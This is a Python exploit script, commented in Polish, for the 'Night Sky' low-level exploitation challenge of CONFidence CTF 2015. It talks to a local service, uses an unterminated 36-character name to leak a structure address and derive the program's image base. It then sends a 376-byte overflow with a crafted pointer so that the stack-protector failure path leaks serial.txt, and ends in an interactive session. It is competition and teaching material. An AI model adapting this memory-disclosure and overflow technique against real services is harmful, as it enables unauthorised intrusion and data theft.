#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
  Nazwa pliku:      leak_serial_1.py
  Autor:            Mateusz Jurczyk
  Zadanie:          Night Sky
  Zawody:           CONFidence CTF 2015
  Kategoria:        Eksploitacja niskopoziomowa
  Punktacja:        500 pkt. (bardzo trudne)
  Liczba rozwiązań: 2 z 11 drużyn
"""

import socket
import struct
import telnetlib

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer[-len(text):] != text:
    buffer += s.recv(1)
  return buffer[:-len(text)]

def dw(x):
  return struct.pack("<H", x)

def dd(x):
  return struct.pack("<I", x)

def dq(x):
  return struct.pack("<Q", x)

def add_star(s, age, name):
  read_until(s, "Select an operation.\n")
  s.send(dd(0))
  read_until(s, "Age?\n")
  s.send(dd(age))
  read_until(s, "Name?\n")
  s.send(dq(len(name)) + name)

def edit_star(s, idx, age, name):
  read_until(s, "Select an operation.\n")
  s.send(dd(2))
  read_until(s, "Which star?\n")
  s.send(dq(idx))
  read_until(s, "Age?\n")
  s.send(dd(age))
  read_until(s, "Name?\n")
  s.send(dq(len(name)) + name)

def list_stars(s):
  read_until(s, "Select an operation.\n")
  s.send(dd(3))

def create_constellation(s, name, stars):
  read_until(s, "Select an operation.\n")
  s.send(dd(4))
  read_until(s, "Name?\n")
  s.send(dq(len(name)) + name)
  read_until(s, "Stars?\n")
  s.send(dq(len(stars)))
  for star in stars:
    s.send(dq(star))

def register_program(s, payload, length = None):
  if length == None:
    length = len(payload) + 1
  
  read_until(s, "Select an operation.\n")
  s.send(dd(8))
  read_until(s, "What serial number?\n")
  s.send(dw(length) + payload)

def main():
  # Połącz się z usługą.
  s = socket.socket()
  s.connect(("127.0.0.1", 1337))

  # Utwórz gwiazdę i konstelację, a następnie ustaw nazwę gwiazdy na
  # 36 znaków, co spowoduje niedomknięcie ciągu ASCII.
  add_star(s, 1337, "star")
  create_constellation(s, "constellation", [0])
  edit_star(s, 0, 1337, "A" * 36)

  # Ujawnij adres struktury konstelacji i oblicz na jego podstawie
  # adres bazowy programu.
  list_stars(s)
  read_until(s, "A" * 36)
  static_address = struct.unpack("<Q", s.recv(6) + "\x00\x00")[0]
  IMAGEBASE = static_address - 0x205060

  # Sprowokuj wywołanie __stack_chk_fail, oczekując na ujawnienie
  # zawartości pliku serial.txt.
  register_program(s, "A" * 376 + dq(IMAGEBASE + 0x205780),
                   length = 0)

  # Przejdź w tryb interaktywny.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

if __name__ == "__main__":
  main()

